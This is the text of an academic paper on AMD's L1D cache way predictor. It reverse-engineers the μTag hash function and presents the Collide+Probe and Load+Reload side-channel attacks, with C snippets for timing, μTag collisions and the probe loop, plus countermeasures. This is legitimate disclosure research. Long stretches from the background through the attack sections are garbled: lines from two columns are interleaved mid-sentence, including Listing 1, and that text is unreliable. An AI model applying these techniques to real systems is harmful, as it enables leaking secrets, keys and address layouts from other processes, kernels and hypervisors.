Take A Way: Exploring the Security Implications of AMD's Cache Way Predictors

Moritz Lipp (Graz University of Technology), Vedad Hadžić (Graz University of Technology), Michael Schwarz (Graz University of Technology), Arthur Perais (Unaffiliated), Clémentine Maurice (Univ Rennes, CNRS, IRISA), Daniel Gruss (Graz University of Technology)

ABSTRACT
To optimize the energy consumption and performance of their CPUs, AMD introduced a way predictor for the L1-data (L1D) cache to predict in which cache way a certain address is located. Consequently, only this way is accessed, significantly reducing the power consumption of the processor.
In this paper, we are the first to exploit the cache way predictor. We reverse-engineered AMD's L1D cache way predictor in microarchitectures from 2011 to 2019, resulting in two new attack techniques. With Collide+Probe, an attacker can monitor a victim's memory accesses without knowledge of physical addresses or shared memory when time-sharing a logical core. With Load+Reload, we exploit the way predictor to obtain highly-accurate memory-access traces of victims on the same physical core. While Load+Reload relies on shared memory, it does not invalidate the cache line, allowing stealthier attacks that do not induce any last-level-cache evictions.
We evaluate our new side channel in different attack scenarios. We demonstrate a covert channel with up to 588.9 kB/s, which we also use in a Spectre attack to exfiltrate secret data from the kernel. Furthermore, we present a key-recovery attack from a vulnerable cryptographic implementation. We also show an entropy-reducing attack on ASLR of the kernel of a fully patched Linux system, the hypervisor, and our own address space from JavaScript. Finally, we propose countermeasures in software and hardware mitigating the presented attacks.

CCS CONCEPTS
• Security and privacy → Side-channel analysis and countermeasures; Operating systems security.

ACM Reference Format:
Moritz Lipp, Vedad Hadžić, Michael Schwarz, Arthur Perais, Clémentine Maurice, and Daniel Gruss. 2020. Take A Way: Exploring the Security Implications of AMD's Cache Way Predictors. In Proceedings of the 15th ACM Asia Conference on Computer and Communications Security (ASIA CCS '20), October 5–9, 2020, Taipei, Taiwan. ACM, New York, NY, USA, 13 pages. https://doi.org/10.1145/3320269.3384746

1 INTRODUCTION
With caches, out-of-order execution, speculative execution, or simultaneous multithreading (SMT), modern processors are equipped with numerous features optimizing the system's throughput and power consumption. Despite their performance benefits, these optimizations are often not designed with a central focus on security properties. Hence, microarchitectural attacks have exploited these optimizations to undermine the system's security.
Cache attacks on cryptographic algorithms were the first microarchitectural attacks [12, 42, 59]. Osvik et al. [58] showed that an attacker can observe the cache state at the granularity of a cache set using Prime+Probe. Yarom et al. [81] proposed Flush+Reload, a technique that can observe victim activity at a cache-line granularity. Both Prime+Probe and Flush+Reload are generic techniques that allow implementing a variety of different attacks, e.g., on cryptographic algorithms [12, 25, 50, 54, 59, 65, 81], web server function calls [83], user input [31, 48, 82], and address layout [24]. Flush+Reload requires shared memory between the attacker and the victim. When attacking the last-level cache, Prime+Probe requires it to be shared and inclusive. While some Intel processors do not have inclusive last-level caches anymore [80], AMD always focused on non-inclusive or exclusive last-level caches [38]. Without inclusivity and shared memory, these attacks do not apply to AMD CPUs.
With the recent transient-execution attacks, adversaries can directly exfiltrate otherwise inaccessible data on the system [41, 49, 67, 73, 74]. However, AMD's microarchitectures seem to be vulnerable to only a few of them [6, 16]. Consequently, AMD CPUs do not require software mitigations with high performance penalties. Additionally, with the performance improvements of the latest microarchitectures, the share of AMD CPUs used is currently increasing in the cloud [7] and consumer desktops [34].
Since the Bulldozer microarchitecture [3], AMD uses an L1D cache way predictor in their processors. The predictor computes a μTag using an undocumented hash function on the virtual address. This μTag is used to look up the L1D cache way in a prediction table. Hence, the CPU has to compare the cache tag in only one way instead of all possible ways, reducing the power consumption.
In this paper, we present the first attacks on cache way predictors. For this purpose, we reverse-engineered the undocumented hash function of AMD's L1D cache way predictor in microarchitectures from 2011 up to 2019. We discovered two different hash functions that have been implemented in AMD's way predictors. Knowledge of these functions is the basis of our attack techniques. In the first attack technique, Collide+Probe, we exploit μTag collisions of virtual addresses to monitor the memory accesses of a victim time-sharing the same logical core. Collide+Probe does not require shared memory between the victim and the attacker, unlike Flush+Reload, and no knowledge of physical addresses, unlike Prime+Probe. In the second attack technique, Load+Reload, we exploit the property that a physical memory location can only reside once in the L1D cache. Thus, accessing the same location with a different virtual address evicts the location from the L1D cache. This allows an attacker to monitor memory accesses on a victim, even if the victim runs on a sibling logical core. Load+Reload is on par with Flush+Reload in terms of accuracy and can achieve a higher temporal resolution as it does not invalidate a cache line in the entire cache hierarchy.

2 BACKGROUND
In this section, we provide background on CPU caches, cache attacks, high-resolution timing sources, simultaneous multithreading (SMT), and way prediction.

2.1 CPU Caches
CPU caches are a type of memory that is small and fast, that the CPU uses to store copies of data from main memory to hide the latency of memory accesses.
Modern CPUs have multiple cache terms of accuracy and can achieve a higher temporal resolution levels, typically three, varying in size and latency: the L1 cache is as it does not invalidate a cache line in the entire cache hierarchy. the smallest and fastest, while the L3 cache, also called the last-level This allows stealthier attacks that do not induce last-level-cache cache, is bigger and slower. evictions. Modern caches are set-associative, i.e., a cache line is stored in a We demonstrate the implications of Collide+Probe and Load+ fixed set determined by either its virtual or physical address. TheL1 Reload in different attack scenarios. First, we implement a covert cache typically has 8 ways per set, and the last-level cache has 12 to channel between two processes with a transmission rate of up to 20 ways, depending on the size of the cache. Each line can be stored 588.9 kB/s outperforming state-of-the-art covert channels. Second, in any of the ways of a cache set, as determined by the replacement we use 휇Tag collisions to reduce the entropy of different ASLR policy. While the replacement policy for the L1 and L2 data cache implementations. We break kernel ASLR on a fully updated Linux on Intel is most of the time pseudo least-recently-used (LRU) [1], system and demonstrate entropy reduction on user-space appli- the replacement policy for the last-level cache (LLC) can differ [78]. cations, the hypervisor, and even on our own address space from Intel CPUs until use pseudo least-recently-used (LRU), sandboxed JavaScript. Furthermore, we successfully recover the for newer microarchitectures it is undocumented [78]. secret key using Collide+Probe on an AES T-table implementation. The last-level cache is physically indexed and shared across Finally, we use Collide+Probe as a covert channel in a Spectre attack cores of the same CPU. In most Intel implementations, it is also to exfiltrate secret data from the kernel. While we still use acache- inclusive of L1 and L2, which means that all data in L1 and L2 is based covert channel, in contrast to previous attacks [41, 44, 51, 69], also stored in the last-level cache. On AMD processors, the L1D we do not rely on shared memory between the user application and cache is virtually indexed and physically tagged (VIPT). On AMD the kernel. We propose different countermeasures in software and processors, the last-level cache is a non-inclusive victim cache while hardware, mitigating Collide+Probe and Load+Reload on current on most Intel CPUs it is inclusive. To maintain the inclusiveness systems and in future designs. property, every line evicted from the last-level cache is also evicted from L1 and L2. The last-level cache, though shared across cores, Contributions. The main contributions are as follows: is also divided into slices. The undocumented hash function on (1) We reverse engineer the L1D cache way predictor of AMD Intel CPUs that maps physical addresses to slices has been reverse- CPUs and provide the addressing functions for virtually all engineered [52]. microarchitectures. (2) We uncover the L1D cache way predictor as a source of 2.2 Cache Attacks side-channel leakage and present two new cache-attack tech- Cache attacks are based on the timing difference between accessing niques, Collide+Probe and Load+Reload. cached and non-cached memory. They can be leveraged to build (3) We show that Collide+Probe is on par with Flush+Reload side-channel attacks and covert channels. 
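To make this timing difference concrete, the following minimal C sketch times a single load with rdtscp and compares a flushed (uncached) access against a cached one. It is an illustration rather than the paper's measurement code; any threshold derived from the printed cycle counts must be calibrated per CPU, and on recent AMD CPUs a counting thread would replace rdtscp (cf. Section 2.3).

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>          /* __rdtscp, _mm_clflush, _mm_mfence */

/* Time a single load of *p in cycles. */
static uint64_t timed_load(volatile uint8_t *p) {
    unsigned aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*p;                            /* the probed memory access */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

int main(void) {
    static uint8_t probe[64];
    _mm_clflush(probe);                  /* force a cache miss on the next load */
    uint64_t miss = timed_load(probe);
    uint64_t hit  = timed_load(probe);   /* now served from the cache */
    printf("miss: %llu cycles, hit: %llu cycles\n",
           (unsigned long long)miss, (unsigned long long)hit);
    return 0;
}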
Among cache attacks, and Prime+Probe but works in scenarios where other cache access-driven attacks are the most powerful ones, where an attacker attacks fail. monitors its own activity to infer the activity of its victim. More (4) We demonstrate and evaluate our attacks in sandboxed specifically, an attacker detects which cache lines or cache setsthe JavaScript and virtualized cloud environments. victim has accessed. Access-driven attacks can further be categorized into two types, Responsible Disclosure. We responsibly disclosed our findings to depending on whether or not the attacker shares memory with AMD on August 23rd, 2019. its victim, e.g., using a shared library or memory deduplication. Flush+Reload [81], Evict+Reload [31] and Flush+Flush [30] all rely Outline. Section 2 provides background information on CPU on shared memory that is also shared in the cache to infer whether caches, cache attacks, way prediction, and simultaneous multi- the victim accessed a particular cache line. The attacker evicts the threading (SMT). Section 3 describes the reverse engineering of the shared data either by using the clflush instruction (Flush+Reload way predictor that is necessary for our Collide+Probe and Load+ and Flush+Flush), or by accessing congruent addresses, i.e., cache Reload attack techniques outlined in Section 4. In Section 5, we lines that belong to the same cache set (Evict+Reload). These at- evaluate the attack techniques in different scenarios. Section 6 dis- tacks have a very fine granularityi.e. ( , a 64- memory region), cusses the interactions between the way predictor and other CPU but they are not applicable if shared memory is not available in the features. We propose countermeasures in Section 7 and conclude corresponding environment. Especially in the cloud, shared mem- our work in Section 8. ory is usually not available across VMs as memory deduplication is Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan disabled for security concerns [75]. Irazoqui et al. [38] showed that unprivileged high-resolution timers are unavailable. Schwarz et al. an attack similar to Flush+Reload is also possible in a cross-CPU [65] showed that a counting can have a higher resolution attack. It exploits that cache invalidations (e.g., from clflush) are than the rdtsc instruction on Intel CPUs. A counting thread con- propagated to all physical processors installed in the same system. stantly increments a global variable used as a timestamp without When reloading the data, as in Flush+Reload, they can distinguish relying on microarchitectural specifics and, thus, can also be used the timing difference between a cache hit in a remote processor on AMD CPUs. and a cache miss, which goes to DRAM. The second type of access-driven attacks, called Prime+Probe [37, 2.4 Simultaneous Multithreading (SMT) 50, 59], does not rely on shared memory and is, thus, applicable to Simultaneous Multithreading (SMT) allows optimizing the effi- more restrictive environments. As the attacker has no shared cache ciency of superscalar CPUs. SMT enables multiple independent line with the victim, the clflush instruction cannot be used. Thus, threads to run in parallel on the same physical core sharing the the attacker has to access congruent addresses instead (cf. Evict+ same resources, e.g., execution units and buffers. This allows uti- Reload). 
The granularity of the attack is coarser, i.e., an attacker only lizing the available resources better, increasing the efficiency and obtains information about the accessed cache set. Hence, this attack throughput of the processor. While on an architectural level, the is more susceptible to noise. In addition to the noise caused by other threads are isolated from each other and cannot access data of other processes, the replacement policy makes it hard to guarantee that threads, on a microarchitectural level, the same physical resources data is actually evicted from a cache set [29]. may be used. Intel introduced SMT as Hyperthreading in 2002. AMD With the general development to switch from inclusive caches to introduced 2-way SMT with the Zen microarchitecture in 2017. non-inclusive caches, Intel introduced cache directories. Yan et al. Recently, microarchitectural attacks also targeted different shared [80] showed that the cache directory is still inclusive, and an at- resources: the TLB [23], store buffer [15], execution ports [8, 13], tacker can evict a cache directory entry of the victim to invalidate fill-buffers [67, 74], and load ports [67, 74]. the corresponding cache line. This allows mounting Prime+Probe and Evict+Reload attacks on the cache directory. They also ana- 2.5 Way Prediction lyzed whether the same attack works on AMD Piledriver and Zen To look up a cache line in a set-associative cache, bits in the address processors and discovered that it does not, because these processors determine in which set the cache line is located. With an 푛-way either do not use a directory or use a directory with high associa- cache, 푛 possible entries need to be checked for a tag match. To tivity, preventing cross-core eviction either way. Thus, it remains avoid wasting power for 푛 comparisons leading to a single match, to be answered what types of eviction-based attacks are feasible on Inoue et al. [36] presented way prediction for set-associative caches. AMD processors and on which microarchitectural structures. Instead of checking all ways of the cache, a way is predicted, and only this entry is checked for a tag match. As only one way is 2.3 High-resolution Timing activated, the power consumption is reduced. If the prediction is correct, the access has been completed, and access times similar to For most cache attacks, the attacker requires a method to measure a direct-mapped cache are achieved. If the prediction is incorrect, a rdtsc timing differences in the range of a few CPU cycles. The normal associative check has to be performed. instruction provides unprivileged access to a model-specific register We only describe AMD’s way predictor [5, 22] in more detail returning the current cycle count and is commonly used for cache in the following section. However, other CPU manufacturers hold attacks on Intel CPUs. Using this instruction, an attacker can get patents for cache way prediction as well [56, 63]. CPU’s like the timestamps with a resolution between 1 and 3 cycles on modern Alpha 21264 [40] also implement way prediction to combine the CPUs. On AMD CPUs, this register has a cycle-accurate resolution advantages of set-associative caches and the fast access time of a until the Zen microarchitecture. Since then, it has a significantly direct-mapped cache. lower resolution as it is only updated every 20 to 35 cycles (cf. Appendix A). 
Thus, rdtsc is only sufficient if the attacker can 3 REVERSE-ENGINEERING AMDS WAY repeat the measurement and use the average timing differences PREDICTOR over all executions. If an attacker tries to monitor one-time events, the rdtsc instruction on AMD cannot directly be used to observe In this section, we explain how to reverse-engineer the L1D way timing differences, which are only a few CPU cycles. predictor used in AMD CPUs since the Bulldozer microarchitecture. The AMD microarchitecture provides the Actual Perfor- First, we explain how the AMD L1D way predictor predicts the mance Frequency Clock Counter (APERF counter) [4] which can be L1D cache way based on hashed virtual addresses. Second, we used to improve the accuracy of the timestamp counter. However, reverse-engineer the undocumented hash function used for the way it can only be accessed in kernel mode. Although other timing prediction in different microarchitectures. With the knowledge of primitives provided by the kernel, such as get_monotonic_time, the hash function and how the L1D way predictor works, we can provide nanosecond resolution, they can be more noisy and still then build powerful side-channel attacks exploiting AMD’s way not sufficiently accurate to observe timing differences, whichare predictor. only a few CPU cycles. Hence, on more recent AMD CPUs, it is necessary to resort to a 3.1 Way Predictor different method for timing measurements. Lipp48 etal.[ ] showed Since the AMD Bulldozer microarchitecture, AMD uses a way pre- that counting threads can be used on ARM-based devices where dictor in the L1 data cache [3]. By predicting the cache way, the CPU ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

only has to compare the cache tag in one way instead of all ways. While this reduces the power consumption of an L1D lookup [5], it may increase the latency in the case of a misprediction.
Every cache line in the L1D cache is tagged with a linear-address-based μTag [5, 22]. This μTag is computed using an undocumented hash function, which takes the virtual address as the input. For every memory load, the way predictor predicts the cache way based on this μTag. As the virtual address, and thus the μTag, is known before the physical address, the CPU does not have to wait for the TLB lookup. Figure 1 illustrates AMD's way predictor. If there is no match for the calculated μTag, an early miss is detected, and a request to L2 issued.

[Figure 1: Simplified illustration of AMD's way predictor. The virtual address (VA) is hashed into a μTag that indexes the prediction table of the addressed set and selects one way (Way 1 ... Way n); on a μTag mismatch, an early miss is signaled and the request goes to L2.]

Aliased cache lines can induce performance penalties, i.e., two different virtual addresses map to the same physical location. VIPT caches with a size lower or equal to the number of ways multiplied by the page size behave functionally like PIPT caches. Hence, there are no duplicates for aliased addresses and, thus, in such a case where data is loaded from an aliased address, the load sees an L1D cache miss and thus loads the data from the L2 data cache [5]. If there are multiple memory loads from aliased virtual addresses, they all suffer an L1D cache miss. The reason is that every load updates the μTag and thus ensures that any other aliased address sees an L1D cache miss [5]. In addition, if two different virtual addresses yield the same μTag, accessing one after the other yields a conflict in the μTag table. Thus, an L1D cache miss is suffered, and the data is loaded from the L2 data cache.

3.2 Hash Function
The L1D way predictor computes a hash (μTag) from the virtual address, which is used for the lookup to the way-predictor table. We assume that this undocumented hash function is linear based on the knowledge of other such hash functions, e.g., the cache-slice function of Intel CPUs [52], the DRAM-mapping function of Intel, ARM, and AMD CPUs [2, 60, 70], or the hash function for indirect branch prediction on Intel CPUs [41]. Moreover, we expect the size of the μTag to be a power of 2, resulting in a linear function.
We rely on μTag collisions to reverse-engineer the hash function. We pick two random virtual addresses that map to the same cache set. If the two addresses have the same μTag, repeatedly accessing them one after the other results in conflicts. As the data is then loaded from the L2 cache, we can either measure an increased access time or observe an increased number in the performance counter for L1 misses, as illustrated in Figure 2.

[Figure 2: Measured duration of 250 alternating accesses to addresses with and without the same μTag (histogram of access time in counting-thread increments vs. number of measurements; colliding addresses cluster at clearly higher access times than non-colliding addresses).]

Creating Sets. With the ability to detect conflicts, we can build N sets representing the number of entries in the μTag table. First, we create a pool v of virtual addresses, which all map to the same cache set, i.e., where bits 6 to 11 of the virtual address are the same. We start with one set S_0 containing one random virtual address out of the pool v. For each other randomly-picked address v_x, we measure the access time while alternately accessing v_x and an address from each set S_0 ... S_n. If we encounter a high access time, we measure conflicts and add v_x to that set. If v_x does not conflict with any existing set, we create a new set S_{n+1} containing v_x.
In our experiments, we recovered 256 sets. Due to measurement errors caused by system noise, there are sets with single entries that can be discarded. Furthermore, to retrieve all sets, we need to make sure to test against virtual addresses where a wide range of bits is set, covering the yet unknown bits used by the hash function.

Recovering the Hash Function. Every virtual address which is in the same set produces the same hash. To recover the hash function, we need to find which bits in the virtual address are used for the 8 output bits that map to the 256 sets. Due to its linearity, each output bit of the hash function can be expressed as a series of XORs of bits in the virtual address. Hence, we can express the virtual addresses as an over-determined linear equation system in the finite field GF(2). The solutions of the equation system are then linear functions that produce the μTag from the virtual address.
To build the equation system, we use each of the virtual addresses in the 256 sets. For every virtual address, the b bits of the virtual address a are the coefficients, and the bits of the hash function x are the unknowns. The right-hand side of the equation y is the same for all addresses in the set. Hence, for every address a in set s, we get an equation of the form

a_{b-1} x_{b-1} ⊕ a_{b-2} x_{b-2} ⊕ ... ⊕ a_{12} x_{12} = y_s.

While the least-significant bits 0-5 define the cache-line offset, note that bits 6-11 determine the cache set and are not used for the μTag computation [5]. To solve the equation system, we used the Z3 SMT solver. Every solution vector represents a function which XORs the virtual-address bits that correspond to '1'-bits in the solution vector. The hash function is the set of linearly independent functions, i.e., every linearly independent function yields one bit of the hash function. The order of the bits cannot be recovered. However, this is not relevant, as we are only interested in whether addresses collide, not in their numeric μTag value.
We successfully recovered the undocumented μTag hash function on the AMD Zen, Zen+, and Zen 2 microarchitectures. The function illustrated in Figure 3a uses bits 12 to 27 to produce an 8-bit value mapping to one of the 256 sets:

h(v) = (v_12 ⊕ v_27) ∥ (v_13 ⊕ v_26) ∥ (v_14 ⊕ v_25) ∥ (v_15 ⊕ v_20) ∥ (v_16 ⊕ v_21) ∥ (v_17 ⊕ v_22) ∥ (v_18 ⊕ v_23) ∥ (v_19 ⊕ v_24)

We recovered the same function for the various models of the AMD Zen microarchitectures that are listed in Table 1. For the Bulldozer microarchitecture (FX-4100), the Piledriver microarchitecture (FX-8350), and the Steamroller microarchitecture (A10-7870K), the hash function uses the same bits but in a different combination (Figure 3b).

[Figure 3: The recovered hash functions use bits 12 to 27 of the virtual address to compute the μTag; (a) Zen, Zen+, Zen 2 and (b) Bulldozer, Piledriver, Steamroller each show which pair of address bits is XORed into each of the eight output bits f_1 ... f_8.]
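The recovered function translates directly into code. The following helper (an illustration, with names chosen here) computes the 8-bit μTag of a virtual address by XORing the address-bit pairs listed above; the assignment of pairs to output-bit positions is arbitrary, which does not matter since only μTag equality, i.e., collisions, is of interest.

#include <stdint.h>

/* 8-bit μTag of a virtual address on Zen, Zen+, and Zen 2, built from the
 * recovered XOR pairs of virtual-address bits 12 to 27. */
static uint8_t mutag_zen(uintptr_t va) {
    uint8_t tag = 0;
    tag |= (uint8_t)((((va >> 12) ^ (va >> 27)) & 1) << 0);
    tag |= (uint8_t)((((va >> 13) ^ (va >> 26)) & 1) << 1);
    tag |= (uint8_t)((((va >> 14) ^ (va >> 25)) & 1) << 2);
    tag |= (uint8_t)((((va >> 15) ^ (va >> 20)) & 1) << 3);
    tag |= (uint8_t)((((va >> 16) ^ (va >> 21)) & 1) << 4);
    tag |= (uint8_t)((((va >> 17) ^ (va >> 22)) & 1) << 5);
    tag |= (uint8_t)((((va >> 18) ^ (va >> 23)) & 1) << 6);
    tag |= (uint8_t)((((va >> 19) ^ (va >> 24)) & 1) << 7);
    return tag;
}

/* Two virtual addresses can collide in the way predictor if they map to the
 * same cache set (bits 6-11) and produce the same μTag. */
static int may_collide(uintptr_t a, uintptr_t b) {
    return ((a >> 6) & 0x3f) == ((b >> 6) & 0x3f) && mutag_zen(a) == mutag_zen(b);
}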

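The conflict test used above to group addresses into μTag sets can be sketched as follows, under the assumption of a calibrated timing primitive; the threshold and the rdtscp-based timer are placeholders and would have to be adapted to the machine under test (e.g., replaced by a counting thread on Zen CPUs).

#include <stdint.h>
#include <x86intrin.h>

#define ROUNDS    250   /* alternating accesses, as in Figure 2 */
#define THRESHOLD 60    /* hypothetical mean-cycle bound; calibrate per CPU */

static uint64_t timed_load(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

/* Two addresses in the same cache set belong to the same μTag set if
 * alternating accesses keep evicting each other to L2, i.e., the mean
 * access latency stays above the calibrated threshold. */
static int same_mutag_set(volatile uint8_t *a, volatile uint8_t *b) {
    uint64_t sum = 0;
    for (int i = 0; i < ROUNDS; i++)
        sum += timed_load(a) + timed_load(b);
    return sum / (2 * ROUNDS) > THRESHOLD;
}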
3.3 Simultaneous Multithreading
As AMD introduced simultaneous multithreading starting with the Zen microarchitecture, the filed patent [22] does not cover any insights on how the way predictor might handle multiple threads. While the way predictor has been used since the Bulldozer microarchitecture [3], parts of the way predictor have only been documented with the release of the Zen microarchitecture [5]. However, the influence of simultaneous multithreading is not mentioned.
Typically, two sibling threads can either share a hardware structure competitively with the option to tag entries or by statically partitioning them. For instance, on the Zen microarchitecture, execution units, schedulers, or the cache are competitively shared, and the store queue and retire queue are statically partitioned [17]. Although the load queue, as well as the instruction and data TLB, are competitively shared between the threads, the data in these structures can only be accessed by the thread owning it.
Under the assumption that the data structures of the way predictor are competitively shared between threads, one thread could directly influence the sibling thread, enabling cross-thread attacks. We validate this assumption by accessing two addresses with the same μTag on both threads. However, we do not observe collisions, neither by measuring the access time nor in the number of L1 misses. While we reverse-engineered the same mapping function (see Section 3.2) for both threads, the possibility remains that additional per-thread information is used for selecting the data-structure entry, allowing one thread to evict entries of the other.
Hence, we extend the experiment by accessing addresses mapping to all possible μTags on one hardware thread (and all possible cache sets). While we repeatedly accessed one of these addresses on one hardware thread, we measure the number of L1 misses to a single virtual address on the sibling thread. However, we are not able to observe any collisions and, thus, conclude that either individual structures are used per thread or that they are shared but tagged for each thread. The only exceptions are aliased loads, as the hardware updates the μTag in the aliased way (see Section 3.1).
In another experiment, we measure access times of two virtual addresses that are mapped to the same physical address. As documented [5], loads to an aliased address see an L1D cache miss and, thus, load the data from the L2 data cache. While we verified this behavior, we additionally observed that this is also the case if the other thread performs the other load. Hence, the structure used is searched by the sibling thread, suggesting a competitively shared structure that is tagged with the hardware threads.

4 USING THE WAY PREDICTOR FOR SIDE CHANNELS
In this section, we present two novel side channels that leverage AMD's L1D cache way predictor. With Collide+Probe, we monitor memory accesses of a victim's process without requiring the knowledge of physical addresses. With Load+Reload, while relying on shared memory similar to Flush+Reload, we can monitor memory accesses of a victim's process running on the sibling hardware thread without invalidating the targeted cache line from the entire cache hierarchy.

4.1 Collide+Probe
Collide+Probe is a new cache side channel exploiting μTag collisions in AMD's L1D cache way predictor. As described in Section 3, the way predictor uses virtual-address-based μTags to predict the L1D cache way. If an address is accessed, the μTag is computed, and the way-predictor entry for this μTag is updated. If a subsequent access to a different address with the same μTag is performed, a μTag collision occurs, and the data has to be loaded from the L2 cache, increasing the access time. With Collide+Probe, we exploit this timing difference to monitor accesses to such colliding addresses.

Threat Model. For this attack, we assume that the attacker has unprivileged native code execution on the target machine and runs on the same logical CPU core as the victim. Furthermore, the attacker can force the execution of the victim's code, e.g., via a function call in a library or a system call.

Setup. The attacker first chooses a virtual address v of the victim that should be monitored for accesses. This can be an arbitrary valid address in the victim's address space. There are no constraints in choosing the address. The attacker can then compute the μTag μ_v of the target address using the hash function from Section 3.2. We assume that ASLR is either not active or has already been broken (cf. Section 5.2). However, although with ASLR, the actual virtual addresses used in the victim's process are typically unknown to the attacker, it is still possible to mount an attack. Instead of choosing a virtual address, the attacker initially performs a cache template attack [31] to detect which of 256 possible μTags should

be monitored. Similar to Prime+Probe [58], where the attacker 1 access(colliding_address); monitors the activity of cache sets, the attacker monitors 휇Tag 2 run_victim(); 3 size_t begin= get _time(); collisions while triggering the victim. 4 access(colliding_address); 5 size_t end= get _time() − begin; Attack. To mount a Collide+Probe attack, the attacker selects 6 if ((end − begin) > THRESHOLD) report_event(); a virtual address 푣 ′ in its own address space that yields the same Listing 1: Implementation of the Collide+Probe attack 휇Tag 휇푣′ as the target address 푣, i.e., 휇푣 = 휇푣′ . As there are only 256 different 휇Tags, this can easily be done by randomly choosing addresses until the chosen address has the same 휇Tag. Moreover, ′ both 푣 and 푣 have to be in the same cache set. However, this is easily Probe over Prime+Probe is that a single memory load is enough satisfiable, as the cache set is determined by bits 6-11 of thevirtual to guarantee that a subsequent load with the same 휇Tag is served address. The attack consists of 3 phases performed repeatedly: from the L2 cache. With Prime+Probe, multiple loads are required to Phase 1: Collide. In the first phase, the attacker accesses the ensure that the target address is evicted from the cache. In modern ′ pre-computed address 푣 and, thus, updates the way predictor. The Prime+Probe attacks, the last-level cache is targeted [37, 48, 50, 66], ′ way predictor associates the cache line of 푣 with its 휇Tag 휇푣′ and and knowledge of physical addresses is required to compute both subsequent memory accesses with the same 휇Tag are predicted to the cache set and cache slice [52]. While Collide+Probe requires be in the same cache way. Since the victim’s address 푣 has the same knowledge of virtual addresses, they are typically easier to get than 휇Tag (휇푣 = 휇푣′ ), the 휇Tag of that cache line is marked invalid and physical addresses. In contrast to Flush+Reload, Collide+Probe does the data is effectively inaccessible from the L1D cache. neither require any specific instructions like clflush nor shared Phase 2: Scheduling the victim. In the second phase, the memory between the victim and the attacker. A disadvantage is victim is scheduled to perform its operations. If the victim does not that distinguishing L1D from L2 hits in Collide+Probe requires a access the monitored address 푣, the way predictor remains in the timing primitive with higher precision than required to distinguish same state as set up by the attacker. Thus, the attacker’s data is cache hits from misses in Flush+Reload. still accessible from the L1D cache. However, if the victim performs an access to the monitored address 푣, the way predictor is updated 4.2 Load+Reload again causing the attacker’s data to be inaccessible from L1D. Load+Reload exploits the way predictor’s behavior for aliased ad- Phase 3: Probe. In the third and last phase of the attack, the ′ dress, i.e., virtual addresses mapping to the same physical address. attacker measures the access time to the pre-computed address 푣 . If When accessing data through a virtual-address alias, the data is the victim has not accessed the monitored address 푣, the data of the ′ always requested from the L2 cache instead of the L1D cache [5]. By pre-computed address 푣 is still accessible from the L1D cache and monitoring the performance counter for L1 misses, we also observe the way prediction is correct. Thus, the measured access time is fast. this behavior across hardware threads. 
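One way to observe these L1 misses on Linux, independently of timing, is the perf_event_open interface. The sketch below (not the authors' measurement code) counts L1D read misses of the calling thread around a single load; availability of this cache event depends on the CPU and kernel configuration.

#include <linux/perf_event.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <string.h>
#include <stdint.h>
#include <stdio.h>

/* Open a counter for L1D read misses of the calling thread (user space only). */
static int open_l1d_miss_counter(void) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.type = PERF_TYPE_HW_CACHE;
    attr.size = sizeof(attr);
    attr.config = PERF_COUNT_HW_CACHE_L1D |
                  (PERF_COUNT_HW_CACHE_OP_READ << 8) |
                  (PERF_COUNT_HW_CACHE_RESULT_MISS << 16);
    attr.disabled = 1;
    attr.exclude_kernel = 1;
    attr.exclude_hv = 1;
    return (int)syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
}

int main(void) {
    static uint8_t buf[64];
    int fd = open_l1d_miss_counter();
    if (fd < 0) { perror("perf_event_open"); return 1; }
    ioctl(fd, PERF_EVENT_IOC_RESET, 0);
    ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
    (void)*(volatile uint8_t *)buf;      /* the load under observation */
    ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
    long long misses = 0;
    if (read(fd, &misses, sizeof(misses)) < 0) perror("read");
    printf("L1D read misses: %lld\n", misses);
    close(fd);
    return 0;
}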
Consequently, this allows If the victim has accessed the monitored address 푣 and thus changed one thread to evict shared data used by the sibling thread with a the state of the way predictor, the attacker suffers an L1D cache miss single load. Although the requested data is stored in the L1D cache, when accessing 푣 ′, as the prediction is now incorrect. The data of ′ it remains inaccessible for the other thread and, thus, introduces a the pre-computed address 푣 is loaded from the L2 cache and, thus, timing difference when it is accessed. the measured access time is slow. By distinguishing between these cases, the attacker can deduce whether the victim has accessed the Threat Model. For this attack, we assume that the attacker has targeted data. unprivileged native code execution on the target machine. The Listing 1 shows an implementation of the Collide+Probe attack attacker and victim run simultaneously on the same physical but where the colliding address colliding_address is computed be- different logical CPU thread. The attack target is a memory location forehand. The code closely follows the three attack phases. First, with virtual address 푣 shared between the attacker and victim, e.g., the colliding address is accessed. Then, the victim is scheduled, il- a shared library. lustrated by the run_victim function. Afterwards, the access time Attack. Load+Reload exploits the timing difference when access- to the same address is measured where the get_time function is ing a virtual-address alias 푣 ′ to build a cross-thread attack on shared implemented using a timing source discussed in Section 2.3. The memory. The attack consists of 3 phases: measured access time allows the attacker to distinguish between an Phase 1: Load. In contrast to Flush+Reload, where the targeted L1D cache hit and an L2-cache hit and, thus, deduce if the victim address 푣 is flushed from the cache hierarchy, Load+Reload loads has accessed the targeted address. As other accesses with the same an address 푣 ′ with the same physical tag as 푣 in the first phase. cache set influence the measurements, the attacker can repeat the Thereby, it renders the cache line containing 푣 inaccessible from experiment to average out the measured noise. the L1D cache for the sibling thread. Comparison to Other Cache Attacks. Finally, we want to discuss Phase 2: Scheduling the victim. In the second phase, the victim the advantages and disadvantages of the Collide+Probe attack in process is scheduled. If the victim process accesses the targeted comparison to other cache side-channel attacks. In contrast to cache line with address 푣, it sees an L1D cache miss. As a result, it Prime+Probe, no knowledge of physical addresses is required as the loads the data from the L2 cache, invalidating the attacker’s cache way predictor uses the virtual address to compute 휇Tags. Thus, with line with address 푣 ′ in the process. native code execution, an attacker can find addresses corresponding Phase 3: Reload. In the third phase, the attacker measures the to a specific 휇Tag without any effort. Another advantage of Collide+ access time to the address 푣 ′. If the victim process has accessed the Take A Way: Exploring the Security Implications of AMD’s Cache Way 